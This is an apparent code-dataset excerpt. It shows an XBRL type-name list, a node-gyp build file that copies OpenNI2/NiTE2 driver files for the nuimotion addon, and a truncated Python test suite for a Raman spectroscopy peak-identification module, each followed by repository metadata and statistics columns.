"doubleItemType",
"durationItemType",
"entriesTypeItemType",
"entryTypeItemType",
"extendedType",
"floatItemType",
"footnote",
"footnoteLink",
"foreverType",
"fractionItemType",
"gDayItemType",
"gMonthDayItemType",
"gMonthItemType",
"gYearItemType",
"gYearMonthItemType",
"hexBinaryItemType",
"highlyCompensatedOfficerComplexType",
"identifierOrganizationTypeItemType",
"identifierType",
"identifierTypeItemType",
"intItemType",
"integerItemType",
"invoiceTypeItemType",
"label",
"labelLink",
"languageItemType",
"linkbase",
"linkbaseRef",
"locatorType",
"longItemType",
"mainAccountTypeItemType",
"measuresType",
"monetaryItemType",
"negativeIntegerItemType",
"nonNegativeIntegerItemType",
"nonPositiveIntegerItemType",
"normalizedStringItemType",
"periodOfPerformanceComplexType",
"phoneNumberDescriptionItemType",
"positiveIntegerItemType",
"postingStatusItemType",
"presentationArc",
"presentationLink",
"pureItemType",
"qualifierEntryItemType",
"recordTypeItemType",
"reference",
"referenceLink",
"resourceType",
"revisesUniqueIDActionItemType",
"roleRef",
"roleType",
"segment",
"sharesItemType",
"shortItemType",
"signOfAmountItemType",
"simpleType",
"sourceJournalIDItemType",
"stateItemType",
"streetAddressComplexType",
"stringItemType",
"timeItemType",
"titleType",
"tokenItemType",
"typeOfActionItemType",
"typeOfTransactionCodeItemType",
"unit",
"unsignedByteItemType",
"unsignedIntItemType",
"unsignedLongItemType",
"unsignedShortItemType",
"xbrl",
"xbrlIncludeItemType"
]
| 48.936206
| 464
| 0.640074
| 64,120
| 614,443
| 5.884935
| 0.011962
| 0.069836
| 0.016791
| 0.025711
| 0.831845
| 0.804538
| 0.782799
| 0.754326
| 0.745594
| 0.731527
| 0
| 0.004811
| 0.254483
| 614,443
| 12,555
| 465
| 48.940104
| 0.818939
| 0.012673
| 0
| 0.771277
| 1
| 0.008976
| 0.085675
| 0.016715
| 0
| 0
| 0
| 0
| 0
| 1
| 0.175947
| false
| 0.014461
| 0.000914
| 0.037317
| 0.267786
| 0.066656
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
cb5dd0d1f09b0b40c7950d5a3086cbc055c02423
| 6,252
|
gyp
|
Python
|
binding.gyp
|
bengfarrell/nuimotion
|
7117c251389b68e2e5d1b8fb8fb1ccd0550b5a77
|
[
"MIT"
] | 21
|
2015-01-28T23:41:08.000Z
|
2021-03-03T23:19:55.000Z
|
binding.gyp
|
bengfarrell/nuimotion
|
7117c251389b68e2e5d1b8fb8fb1ccd0550b5a77
|
[
"MIT"
] | 3
|
2015-08-30T11:37:52.000Z
|
2020-10-16T13:57:59.000Z
|
binding.gyp
|
bengfarrell/nuimotion
|
7117c251389b68e2e5d1b8fb8fb1ccd0550b5a77
|
[
"MIT"
] | 8
|
2015-03-03T15:46:35.000Z
|
2018-02-05T04:00:20.000Z
|
{
"variables": {
# Be sure to create OPENNI2 and NITE2 system vars
"OPENNI2%": "$(OPENNI2)",
"NITE2%": "$(NITE2)"
},
"targets": [
{
"target_name":"copy-files",
"conditions": [
[ "OS=='win'", {
"copies": [
{ "files": [ "<(OPENNI2)/Redist/OpenNI2/Drivers/Kinect.dll",
"<(OPENNI2)/Redist/OpenNI2/Drivers/OniFile.dll",
"<(OPENNI2)/Redist/OpenNI2/Drivers/PS1080.dll",
"<(OPENNI2)/Redist/OpenNI2/Drivers/PS1080.ini",
"<(OPENNI2)/Redist/OpenNI2/Drivers/PSLink.dll",
"<(OPENNI2)/Redist/OpenNI2/Drivers/PSLink.ini"],
"destination": "<(module_root_dir)/build/Release/OpenNI2/Drivers/"
},
# If NITE folder is not placed at root of project, it cannot be accessed
# go up through node_modules to project root and drop in NiTE2 folder
{ "files": [ "<(NITE2)/Redist/NiTE2/Data/lbsdata.idx",
"<(NITE2)/Redist/NiTE2/Data/lbsdata.lbd",
"<(NITE2)/Redist/NiTE2/Data/lbsparam1.lbd",
"<(NITE2)/Redist/NiTE2/Data/lbsparam2.lbd"],
"destination": "<(module_root_dir)/../../NiTE2/Data/"
},
{ "files": [ "<(NITE2)/Redist/NiTE2/FeatureExtraction.ini",
"<(NITE2)/Redist/NiTE2/h.dat",
"<(NITE2)/Redist/NiTE2/HandAlgorithms.ini",
"<(NITE2)/Redist/NiTE2/s.dat"],
"destination": "<(module_root_dir)/../../NiTE2/"
},
{ "files": [ "<(OPENNI2)/Redist/OpenNI2.dll",
"<(OPENNI2)/Redist/OpenNI.ini",
"<(NITE2)/Redist/NiTE2.dll",
"<(NITE2)/Redist/NiTE.ini" ],
"destination": "<(module_root_dir)/build/Release/"
}
],
"libraries": ["-l<(OPENNI2)/Lib/OpenNI2", "-l<(NITE2)/Lib/NiTE2"]
}],
["OS=='mac'", {
"copies": [
{ "files": [ "<(OPENNI2)/Redist/OpenNI2/Drivers/libOniFile.dylib",
"<(OPENNI2)/Redist/OpenNI2/Drivers/libPS1080.dylib",
"<(OPENNI2)/Redist/OpenNI2/Drivers/PS1080.ini",
"<(OPENNI2)/Redist/OpenNI2/Drivers/PSLink.ini"],
"destination": "<(module_root_dir)/build/Release/OpenNI2/Drivers/"
},
# If NITE folder is not placed at root of project, it cannot be accessed
# go up through node_modules to project root and drop in NiTE2 folder
{ "files": [ "<(NITE2)/Redist/NiTE2/Data/lbsdata.idx",
"<(NITE2)/Redist/NiTE2/Data/lbsdata.lbd",
"<(NITE2)/Redist/NiTE2/Data/lbsparam1.lbd",
"<(NITE2)/Redist/NiTE2/Data/lbsparam2.lbd"],
"destination": "<(module_root_dir)/../../NiTE2/Data/"
},
{ "files": [ "<(NITE2)/Redist/NiTE2/FeatureExtraction.ini",
"<(NITE2)/Redist/NiTE2/h.dat",
"<(NITE2)/Redist/NiTE2/HandAlgorithms.ini",
"<(NITE2)/Redist/NiTE2/s.dat"],
"destination": "<(module_root_dir)/../../NiTE2/"
},
{ "files": [ "<(OPENNI2)/Redist/libOpenNI2.dylib",
"<(OPENNI2)/Redist/OpenNI.ini",
"<(NITE2)/Redist/libNiTE2.dylib",
"<(NITE2)/Redist/NiTE.ini" ],
"destination": "<(module_root_dir)/build/Release/"
}
]
}],
["OS=='linux'", {
"copies": [
{ "files": [ "<(OPENNI2)/Redist/OpenNI2/Drivers/libOniFile.so",
"<(OPENNI2)/Redist/OpenNI2/Drivers/libPS1080.so",
"<(OPENNI2)/Redist/OpenNI2/Drivers/PS1080.ini",
"<(OPENNI2)/Redist/OpenNI2/Drivers/PSLink.ini"],
"destination": "<(module_root_dir)/build/Release/OpenNI2/Drivers/"
},
# If NITE folder is not placed at root of project, it cannot be accessed
# go up through node_modules to project root and drop in NiTE2 folder
{ "files": [ "<(NITE2)/Redist/NiTE2/Data/lbsdata.idx",
"<(NITE2)/Redist/NiTE2/Data/lbsdata.lbd",
"<(NITE2)/Redist/NiTE2/Data/lbsparam1.lbd",
"<(NITE2)/Redist/NiTE2/Data/lbsparam2.lbd"],
"destination": "<(module_root_dir)/../../NiTE2/Data/"
},
{ "files": [ "<(NITE2)/Redist/NiTE2/FeatureExtraction.ini",
"<(NITE2)/Redist/NiTE2/h.dat",
"<(NITE2)/Redist/NiTE2/HandAlgorithms.ini",
"<(NITE2)/Redist/NiTE2/s.dat"],
"destination": "<(module_root_dir)/../../NiTE2/"
},
{ "files": [ "<(OPENNI2)/Redist/libOpenNI2.so",
"<(OPENNI2)/Redist/OpenNI.ini",
"<(NITE2)/Redist/libNiTE2.so",
"<(NITE2)/Redist/NiTE.ini" ],
"destination": "<(module_root_dir)/build/Release/"
}
]
}]
]
},
{
"target_name": "nuimotion",
"sources": [
"src/Main.cpp",
"src/enums/EnumMapping.cpp",
"src/gestures/GestureRecognizer.cpp",
"src/gestures/Swipe.cpp",
"src/gestures/Wave.cpp" ],
"conditions": [
[ "OS=='win'", {
"libraries": ["-l<(OPENNI2)/Lib/OpenNI2", "-l<(NITE2)/Lib/NiTE2"]
}],
["OS=='mac'", {
"libraries": ["<(OPENNI2)/Tools/libOpenNI2.dylib", "<(NITE2)/Redist/libNiTE2.dylib"]
}],
["OS=='linux'", {
"libraries": ["<(OPENNI2)/Tools/libOpenNI2.so", "<(NITE2)/Redist/libNiTE2.so"]
}],
],
"include_dirs": [ "./src/enums", "./build/Release", "<(OPENNI2)/Include/", "<(NITE2)/Include/" ],
},
{
"target_name": "nuimotion-depth",
"sources": [
"src/Depth.cpp",
"src/enums/EnumMapping.cpp",
"src/gestures/GestureRecognizer.cpp",
"src/gestures/Swipe.cpp",
"src/gestures/Wave.cpp" ],
"conditions": [
[ "OS=='win'", {
"libraries": ["-l<(OPENNI2)/Lib/OpenNI2"]
}],
["OS=='mac'", {
"libraries": ["<(OPENNI2)/Tools/libOpenNI2.dylib"]
}],
["OS=='linux'", {
"libraries": ["<(OPENNI2)/Tools/libOpenNI2.so"]
}],
],
"include_dirs": [ "<(OPENNI2)/Include/"]
}
]
}
| 35.931034
| 102
| 0.508317
| 587
| 6,252
| 5.359455
| 0.153322
| 0.111888
| 0.127146
| 0.120153
| 0.885887
| 0.848061
| 0.813096
| 0.73363
| 0.705022
| 0.705022
| 0
| 0.037903
| 0.295266
| 6,252
| 173
| 103
| 36.138728
| 0.676123
| 0.074216
| 0
| 0.605634
| 0
| 0
| 0.594983
| 0.475779
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
cbbe1609a4f2d2f3ae7f071eb98128dcb1c941f9
| 38,987
|
py
|
Python
|
ramandecompy/tests/test_peakidentify.py
|
kernb2/raman-spectra-decomp-analysis
|
9ee09021e8e57735209812b062607de7e123beea
|
[
"MIT"
] | 14
|
2019-04-23T19:09:56.000Z
|
2022-03-19T16:51:41.000Z
|
ramandecompy/tests/test_peakidentify.py
|
kernb2/raman-spectra-decomp-analysis
|
9ee09021e8e57735209812b062607de7e123beea
|
[
"MIT"
] | 53
|
2019-04-23T19:55:35.000Z
|
2020-05-20T03:43:11.000Z
|
ramandecompy/tests/test_peakidentify.py
|
kernb2/raman-spectra-decomp-analysis
|
9ee09021e8e57735209812b062607de7e123beea
|
[
"MIT"
] | 10
|
2020-03-31T18:37:52.000Z
|
2022-02-12T23:14:16.000Z
|
"""
Module used to unit test the functionality and outputs of the peakidentify.py module
"""
# IMPORTING MODULES
import os
import h5py
import numpy as np
import pandas as pd
from ramandecompy import peakidentify
from ramandecompy import dataprep
hdf5_calfilename = 'ramandecompy/tests/test_files/peakidentify_calibration_test.hdf5'
hdf5_expfilename = 'ramandecompy/tests/test_files/peakidentify_experiment_test.hdf5'
key = '300C/25s'
calhdf5 = h5py.File(hdf5_calfilename, 'r+')
exphdf5 = h5py.File(hdf5_expfilename, 'r+')
hdf5_filename = 'ramandecompy/tests/test_files/peakidentify_add_label_test.hdf5'
key = '300C/25s'
peak = 'Peak_01'
label = '[Hydrogen]'
# open hdf5 file as read/write
hdf5 = h5py.File(hdf5_filename, 'r+')
def test_peak_assignment():
"""
This function tests the operation of the peak_assignment
function in peakidentify.py
"""
#First, generate a testing dataset.
hdf5_calfilename = 'ramandecompy/tests/test_files/peakidentify_calibration_test.hdf5'
hdf5_expfilename = 'ramandecompy/tests/test_files/peakidentify_experiment_test.hdf5'
key = '300C/25s'
calhdf5 = h5py.File(hdf5_calfilename, 'r+')
exphdf5 = h5py.File(hdf5_expfilename, 'r+')
unknown_x = list(exphdf5['{}/wavenumber'.format(key)])
unknown_y = list(exphdf5['{}/counts'.format(key)])
unknown_x = np.asarray(unknown_x)
unknown_y = np.asarray(unknown_y)
precision = 10
external_peak_labels = []
peakidentify.peak_assignment(hdf5_expfilename,
key, hdf5_calfilename,
external_peak_labels,
precision, False, plot = False)
#Various try statements to make sure that bad inputs are handled correctly.
try:
peakidentify.peak_assignment(hdf5_expfilename,
key, hdf5_calfilename,
external_peak_labels,
precision, False, plot = False)
except TypeError:
print("An invalid known_compound_list was passed to the function, "
"and it was handled well with a TypeError.")
try:
peakidentify.peak_assignment(hdf5_expfilename,
key, hdf5_calfilename,
'external_peak_labels',
precision, False, plot = False)
except TypeError:
print("An invalid external_peak_labels value was passed to the function, and "
"it was handled well with a TypeError.")
try:
peakidentify.peak_assignment(hdf5_expfilename,
key, hdf5_calfilename,
external_peak_labels,
'precision', False, plot = False)
except TypeError:
print("An invalid precision value was passed to the function, and "
"it was handled well with a TypeError.")
try:
peakidentify.peak_assignment(hdf5_expfilename,
key, hdf5_calfilename,
external_peak_labels,
precision, 'False', plot = False)
except TypeError:
print("An invalid export_label_input value was passed to the function, and it "
"was handled well with a TypeError.")
try:
peakidentify.peak_assignment(hdf5_expfilename,
key, hdf5_calfilename,
external_peak_labels,
precision, False, 'False')
except TypeError:
print("An invalid plot value was passed to the function, and it "
"was handled well with a TypeError.")
calhdf5.close()
exphdf5.close()
# make assertions
def test_compare_unknown_to_known():
"""
This function tests the operation of the compare_unknown_to_known
function in peakidentify.py
"""
#First, generate a testing dataset.
hdf5_calfilename = 'ramandecompy/tests/test_files/peakidentify_calibration_test.hdf5'
hdf5_expfilename = 'ramandecompy/tests/test_files/peakidentify_experiment_test.hdf5'
key = '300C/25s'
calhdf5 = h5py.File(hdf5_calfilename, 'r+')
exphdf5 = h5py.File(hdf5_expfilename, 'r+')
unknown_x = list(exphdf5['{}/wavenumber'.format(key)])
unknown_y = list(exphdf5['{}/counts'.format(key)])
unknown_x = np.asarray(unknown_x)
unknown_y = np.asarray(unknown_y)
known_compound_list = list(calhdf5.keys())
precision = 10
known_peaks = []
known_peaks_list = []
unknown_peaks = []
for i, _ in enumerate(list(exphdf5['{}'.format(key)])[:-3]):
if i < 9:
unknown_peaks.append(list(exphdf5['{}/Peak_0{}'.format(key, i+1)])[0][2])
else:
unknown_peaks.append(list(exphdf5['{}/Peak_{}'.format(key, i+1)])[0][2])
for i, _ in enumerate(known_compound_list):
for _, peak in enumerate(list(calhdf5[known_compound_list[i]])[:-3]):
known_peaks_list.append(list(calhdf5['{}/{}'.format(known_compound_list[i],
peak)])[0][2])
known_peaks.append(known_peaks_list[i])
peakidentify.compare_unknown_to_known(unknown_peaks, known_peaks, precision)
try:
peakidentify.compare_unknown_to_known(1, known_peaks, precision)
except TypeError:
print("An invalid unknown_peaks value was passed to the function, "
"and was handled correctly.")
try:
peakidentify.compare_unknown_to_known(unknown_peaks, 'known_peaks', precision)
except TypeError:
print("An invalid known_peaks value was passed to the function, "
"and was handled correctly.")
try:
peakidentify.compare_unknown_to_known(unknown_peaks, known_peaks, 'precision')
except TypeError:
print("An invalid precision value was passed to the function, and "
"was handled correctly.")
#After testing for resilience to unexpected inputs, now ensure
#outputs are performing correctly
#First, make sure function is returning the list.
assert isinstance(peakidentify.compare_unknown_to_known(
unknown_peaks, known_peaks, precision), np.ndarray), ("""Function
is not returning list""")
#Compare one set of peaks to itself. The full association matrix
#should have all values = 1.
self_comp = np.mean(peakidentify.compare_unknown_to_known(known_peaks,
known_peaks,
precision))
assert self_comp == 1, ("Peak Assignment Error. Comparison of compound "
"against itself should find all peaks.")
dif_comp = np.mean(peakidentify.compare_unknown_to_known([1, 3, 6],
[1000, 2000, 5000],
precision))
assert dif_comp == 0, ("Peak Assignment Error. Passed values should "
"have no matching assignments.")
calhdf5.close()
exphdf5.close()
def test_peak_position_comparisons():
"""
This function tests the operation of the peak_position_comparisons
function in peakidentify. Said function returns a list of strings that
contain text assignments of each peak in the unknown spectrum.
"""
#First, generate a testing dataset.
hdf5_calfilename = 'ramandecompy/tests/test_files/peakidentify_calibration_test.hdf5'
hdf5_expfilename = 'ramandecompy/tests/test_files/peakidentify_experiment_test.hdf5'
key = '300C/25s'
calhdf5 = h5py.File(hdf5_calfilename, 'r+')
exphdf5 = h5py.File(hdf5_expfilename, 'r+')
unknown_x = list(exphdf5['{}/wavenumber'.format(key)])
unknown_y = list(exphdf5['{}/counts'.format(key)])
unknown_x = np.asarray(unknown_x)
unknown_y = np.asarray(unknown_y)
known_compound_list = list(calhdf5.keys())
precision = 10
known_peaks = []
known_peaks_list = []
association_matrix = []
unknown_peaks = []
for i, _ in enumerate(list(exphdf5['{}'.format(key)])[:-3]):
if i < 9:
unknown_peaks.append(list(exphdf5['{}/Peak_0{}'.format(key, i+1)])[0][2])
else:
unknown_peaks.append(list(exphdf5['{}/Peak_{}'.format(key, i+1)])[0][2])
known_peaks = []
known_peaks_list = []
num_peaks_list = []
association_matrix = []
split__index_list = []
for i, _ in enumerate(known_compound_list):
num_peaks_list.append(len(list(calhdf5[known_compound_list[i]])[:-3]))
split__index_list.append(sum(num_peaks_list))
for j, peak in enumerate(list(calhdf5[known_compound_list[i]])[:-3]):
# Need to separate known peaks to make a list of two separate lists
# to perform custom list split using list comprehension + zip()
# and split_index_list
known_peaks_list.append(list(calhdf5['{}/{}'.format(known_compound_list[i],
peak)])[0][2])
result = [known_peaks_list[i : j] for i, j in zip([0] + split__index_list,
split__index_list +
[None])]
known_peaks.append(result)
association_matrix.append(peakidentify.compare_unknown_to_known(
unknown_peaks, known_peaks[i][i], precision))
peakidentify.peak_position_comparisons(unknown_peaks, known_peaks,
association_matrix,
hdf5_calfilename)
#Then, test error handling of bad inputs for the function.
try:
peakidentify.peak_position_comparisons(1, known_peaks,
association_matrix,
hdf5_calfilename)
except TypeError:
print("An invalid unknown_peaks value was passed to the function, "
"and was handled correctly.")
try:
peakidentify.peak_position_comparisons(unknown_peaks,
'known_peaks',
association_matrix,
hdf5_calfilename)
except TypeError:
print("An invalid known_peaks value was passed to the function, "
"and was handled correctly.")
try:
peakidentify.peak_position_comparisons(unknown_peaks,
known_peaks,
'association_matrix',
hdf5_calfilename)
except TypeError:
print("An invalid association_matrix value was passed to the function,"
"and was handled correctly.")
#Check to make sure the function is returning a list.
assert isinstance(peakidentify.peak_position_comparisons(
unknown_peaks, known_peaks,
association_matrix, hdf5_calfilename), list), """The function is
not returning a list."""
#Test a call that says that no peaks have associations
association_matrix_0 = []
association_matrix_0.append(peakidentify.compare_unknown_to_known(
known_peaks[0][0],
known_peaks[1][0],
precision))
zero_output = peakidentify.peak_position_comparisons(known_peaks[0][0],
[known_peaks[1][0]],
association_matrix_0,
hdf5_calfilename)[0]
assert zero_output[0] == 'FormicAcid', """The function is not properly
handling unassigned peaks."""
#Test the function to make sure that it has the right functionality
association_matrix = []
#Generate a matrix with all associations equal to 1
association_matrix.append(peakidentify.compare_unknown_to_known(
known_peaks[0][0],
known_peaks[0][0],
precision))
#change the middle index to 0
association_matrix[0][1] = 0
test_peak_labels = peakidentify.peak_position_comparisons(known_peaks[0][0],
[known_peaks[0][0]],
association_matrix,
hdf5_calfilename)
print(test_peak_labels[0][0])
print(test_peak_labels[1][0])
assert test_peak_labels[0][0] == 'FormicAcid', """The funciton is
not correctly assigning peaks when association matrix = 1"""
assert test_peak_labels[1][0] == 'Unassigned', """The function is
not correctly handling a lack of peak assignments"""
calhdf5.close()
exphdf5.close()
def test_percentage_of_peaks_found():
"""
This function tests the operation of the
percentage_of_peaks_found function in peakidentify.py
"""
#First, generate a testing dataset.
hdf5_calfilename = 'ramandecompy/tests/test_files/peakidentify_calibration_test.hdf5'
hdf5_expfilename = 'ramandecompy/tests/test_files/peakidentify_experiment_test.hdf5'
key = '300C/25s'
calhdf5 = h5py.File(hdf5_calfilename, 'r+')
exphdf5 = h5py.File(hdf5_expfilename, 'r+')
unknown_x = list(exphdf5['{}/wavenumber'.format(key)])
unknown_y = list(exphdf5['{}/counts'.format(key)])
unknown_x = np.asarray(unknown_x)
unknown_y = np.asarray(unknown_y)
known_compound_list = list(calhdf5.keys())
precision = 10
unknown_peaks = []
for i, _ in enumerate(list(exphdf5['{}'.format(key)])[:-3]):
if i < 9:
unknown_peaks.append(list(exphdf5['{}/Peak_0{}'.format(key, i+1)])[0][2])
else:
unknown_peaks.append(list(exphdf5['{}/Peak_{}'.format(key, i+1)])[0][2])
known_peaks = []
known_peaks_list = []
num_peaks_list = []
association_matrix = []
split__index_list = []
for i, _ in enumerate(known_compound_list):
num_peaks_list.append(len(list(calhdf5[known_compound_list[i]])[:-3]))
split__index_list.append(sum(num_peaks_list))
for j, peak in enumerate(list(calhdf5[known_compound_list[i]])[:-3]):
# Need to separate known peaks to make a list of two separate lists
# to perform custom list split using list comprehension + zip()
# and split_index_list
known_peaks_list.append(list(calhdf5['{}/{}'.format(known_compound_list[i],
peak)])[0][2])
result = [known_peaks_list[i : j] for i, j in zip([0] + split__index_list,
split__index_list +
[None])]
known_peaks.append(result)
association_matrix.append(peakidentify.compare_unknown_to_known(
unknown_peaks, known_peaks[i][i], precision))
#Test for input error handling.
peakidentify.percentage_of_peaks_found(known_peaks, association_matrix,
hdf5_calfilename)
try:
peakidentify.percentage_of_peaks_found([[0], [1], [2], [3], [4],
[5],[6],[7],[8],[9]],
association_matrix,
hdf5_calfilename)
except TypeError:
print("""The function correctly handled the error when a list of ints
was input instead of the known_peaks list""")
try:
peakidentify.percentage_of_peaks_found(1, association_matrix,
hdf5_calfilename)
except TypeError:
print("""The function correctly handled the error when an int
was input instead of the known_peaks list""")
try:
peakidentify.percentage_of_peaks_found(known_peaks, 1,
hdf5_calfilename)
except TypeError:
print("""The function correctly handled the error when an int
was input instead of the association matrix""")
#Test to make sure function returns a dictionary.
assert isinstance(peakidentify.percentage_of_peaks_found(
known_peaks,
association_matrix,
hdf5_calfilename), dict), """The function is not
returning a dictionary."""
#Test for function output.
hdf5_calfilename = 'ramandecompy/tests/test_files/peakidentify_calibration_test.hdf5'
acet_peaks = []
key = 'acetaldehyde'
for _, peak in enumerate(list(calhdf5[key])[:-3]):
acet_peaks.append(list(calhdf5['{}/{}'.format(key, peak)])[0][2])
print(acet_peaks)
acet_dict_0 = peakidentify.percentage_of_peaks_found([acet_peaks, [0], [0], [0],
[0], [0], [0],
[0], [0], [0]],
[[0, 0, 0, 0, 0, 0, 0, 0],
[0], [0], [0],
[0], [0], [0],
[0], [0], [0]],
hdf5_calfilename)
assert acet_dict_0[key] == 0, """The function is not correctly
calculating percentages when no peaks are found"""
acet_dict_1 = peakidentify.percentage_of_peaks_found([acet_peaks, [1], [1], [1],
[1], [1], [1], [1], [1], [1]],
[[1, 1, 1, 1, 1, 1, 1, 1],
[1], [1], [1],
[1], [1], [1], [1], [1], [1]],
hdf5_calfilename)
assert acet_dict_1[key] == 100, """The function is not correctly
calculating percentages when all peaks are found"""
calhdf5.close()
exphdf5.close()
# make assertions
def test_plotting_peak_assignments():
"""
This function tests the operation of the peak_assignment
function in peakidentify.py
"""
#First, generate a testing dataset.
hdf5_calfilename = 'ramandecompy/tests/test_files/peakidentify_calibration_test.hdf5'
hdf5_expfilename = 'ramandecompy/tests/test_files/peakidentify_experiment_test.hdf5'
key = '300C/25s'
calhdf5 = h5py.File(hdf5_calfilename, 'r+')
exphdf5 = h5py.File(hdf5_expfilename, 'r+')
unknown_x = list(exphdf5['{}/wavenumber'.format(key)])
unknown_y = list(exphdf5['{}/counts'.format(key)])
unknown_x = np.asarray(unknown_x)
unknown_y = np.asarray(unknown_y)
known_compound_list = list(calhdf5.keys())
precision = 10
unknown_peaks = []
for i, _ in enumerate(list(exphdf5['{}'.format(key)])[:-3]):
if i < 9:
unknown_peaks.append(list(exphdf5['{}/Peak_0{}'.format(key, i+1)])[0][2])
else:
unknown_peaks.append(list(exphdf5['{}/Peak_{}'.format(key, i+1)])[0][2])
known_peaks = []
known_peaks_list = []
num_peaks_list = []
association_matrix = []
split__index_list = []
for i, _ in enumerate(known_compound_list):
num_peaks_list.append(len(list(calhdf5[known_compound_list[i]])[:-3]))
split__index_list.append(sum(num_peaks_list))
for j, peak in enumerate(list(calhdf5[known_compound_list[i]])[:-3]):
# Need to separate known peaks to make a list of two separate lists
# to perform custom list split using list comprehension + zip()
# and split_index_list
known_peaks_list.append(list(calhdf5['{}/{}'.format(known_compound_list[i],
peak)])[0][2])
result = [known_peaks_list[i : j] for i, j in zip([0] + split__index_list,
split__index_list +
[None])]
known_peaks.append(result)
association_matrix.append(peakidentify.compare_unknown_to_known(
unknown_peaks, known_peaks[i][i], precision))
#Ok, so that generates a full association matrix that contains everything
#we need to assign peaks.
#Now, let's go through and actually assign text to peaks.
unknown_peak_assignments = peakidentify.peak_position_comparisons(
unknown_peaks, known_peaks, association_matrix, hdf5_calfilename)
peak_labels = []
for i, _ in enumerate(unknown_peak_assignments):
peak_labels.append(str(unknown_peak_assignments[i]))
#Test for input error handling.
peakidentify.plotting_peak_assignments(unknown_x, unknown_y, unknown_peaks,
unknown_peak_assignments,
hdf5_expfilename,
hdf5_calfilename,
key, peak_labels,
plot = False)
try:
peakidentify.plotting_peak_assignments(1, unknown_y, unknown_peaks,
unknown_peak_assignments,
hdf5_expfilename,
hdf5_calfilename,
key, peak_labels,
plot = False)
except TypeError:
print("""The function correctly handled the error
when an int was input instead of the unknown_x list""")
try:
peakidentify.plotting_peak_assignments(unknown_x, 3, unknown_peaks,
unknown_peak_assignments,
hdf5_expfilename,
hdf5_calfilename,
key, peak_labels,
plot = False)
except TypeError:
print("""The function correctly handled the error when an int
was input instead of the unknown_y list""")
try:
peakidentify.plotting_peak_assignments(unknown_x,
unknown_y,
'unknown_peaks',
unknown_peak_assignments,
hdf5_expfilename,
hdf5_calfilename,
key, peak_labels,
plot = False)
except TypeError:
print("""The function correctly handled the error when a string
was input instead of the unknown_peaks list""")
try:
peakidentify.plotting_peak_assignments(unknown_x,
unknown_y,
unknown_peaks,
3,
hdf5_expfilename,
hdf5_calfilename,
key, peak_labels,
plot = False)
except TypeError:
print("""The function correctly handled the error when an int
was input instead of the unknown_peak_assignments""")
try:
peakidentify.plotting_peak_assignments(unknown_x,
unknown_y,
unknown_peaks,
['WATER', 23, 'CO'],
hdf5_expfilename,
hdf5_calfilename,
key, peak_labels,
plot = False)
except TypeError:
print("""The function correctly handled the case when an int
was passed in the unknown_peak_assignment list""")
try:
peakidentify.plotting_peak_assignments(unknown_x,
unknown_y,
unknown_peaks,
['H', 23, 'CO2'],
hdf5_expfilename,
hdf5_calfilename,
key, peak_labels,
plot = False)
except TypeError:
print("""The function correctly handled the case when an int
was passed in the unknown_peak_assignment list""")
try:
peakidentify.plotting_peak_assignments(unknown_x,
unknown_y,
unknown_peaks,
unknown_peak_assignments,
3,
hdf5_calfilename,
key, peak_labels,
plot = False)
except TypeError:
print("""The function correctly handled the case when an int
was passed in the hdf5_filename""")
try:
peakidentify.plotting_peak_assignments(unknown_x,
unknown_y,
unknown_peaks,
unknown_peak_assignments,
hdf5_expfilename,
3,
key, peak_labels,
plot = False)
except TypeError:
print("""The function correctly handled the case when an int
was passed in the hdf5_calfilename""")
calhdf5.close()
exphdf5.close()
def test_add_label():
"""
Function that adds a label to a peak dataset in the hdf5 file
"""
key = '300C/25s'
peak = 'Peak_01'
label = '[Hydrogen]'
hdf5 = h5py.File(hdf5_filename, 'r+')
data = peakidentify.add_label(hdf5_filename, key, peak, label)
# make assertions
assert len(data) == 8,'incorrect length of dataframe'
assert list(hdf5['{}/{}'.format(key, peak)])[0][-1] == '[Hydrogen]','Wrong string output'
assert isinstance(hdf5['{}/{}'.format(key, peak)][0],np.void), """incorrect key/peak
formatting with hdf5 file"""
assert isinstance(data,pd.DataFrame), 'incorrect output type'
try:
peakidentify.add_label('hdf5_filename', key, peak, label)
except TypeError:
print("An invalid hdf5_filename was passed to the function, "
+"and it was handled well with a TypeError.")
try:
peakidentify.add_label(hdf5_filename, 3, peak, label)
except TypeError:
print("An invalid key was passed to the function, "
+"and it was handled well with a TypeError.")
try:
peakidentify.add_label(hdf5_filename, key, 3, label)
except TypeError:
print("An invalid peak was passed to the function, "
+"and it was handled well with a TypeError.")
try:
peakidentify.add_label(hdf5_filename, key, peak, 3)
except TypeError:
print("An invalid label was passed to the function, "
+"and it was handled well with a TypeError.")
hdf5.close()
def test_peak_1d_score():
"""
Evaluates the functionality of the peak_1D_score function
"""
# Initialize the test arguments
row_i = [0, 1]
row_j = [2, 1]
rowcat = row_i + row_j
arraya = np.array([[0, 1], [2, 1], [0, 3]])
arraycat = np.concatenate((arraya[0], arraya[2]))
precision = 10
# Run Bad Function for lists
try:
testscore = peakidentify.peak_1d_score(row_i, row_j, -1, precision)
except ValueError:
print("An invalid scoremax value was passed to the function, "
"and was handled correctly.")
# Run Bad Function for arrays
try:
arrayscore = peakidentify.peak_1d_score(arraya[0], arraya[2], -1, precision)
except ValueError:
print("An invalid scoremax value was passed to the function, "
"and was handled correctly.")
# Running a good example
testscore = peakidentify.peak_1d_score(row_i, row_j, 1., precision)
arrayscore = peakidentify.peak_1d_score(arraya[0], arraya[2], 1, precision)
# make assertions
assert len(row_i) == len(row_j), 'Input lengths do not match'
assert len(arrayscore[0][:]) == len(arraycat), """Output list length
different than concatenated lists length"""
for i in range(len(rowcat)):
assert 0 <= testscore[0][i] <= 1, 'Output value outside acceptable range'
assert 0 <= arrayscore[0][i] <= 1, 'Output value outside acceptable range'
def test_score_max():
"""
Evaluates the functionality of the score_max function
"""
# Initialize the test arguments
k = 2
row_i = [0, 3]
row_j = [2, 1]
rowcat = row_i + row_j
arraya = np.array([[0, 1], [2, 1], [0, 3]])
precision = 10
arraycat = np.concatenate((arraya[0], arraya[1]))
# Run Function for lists
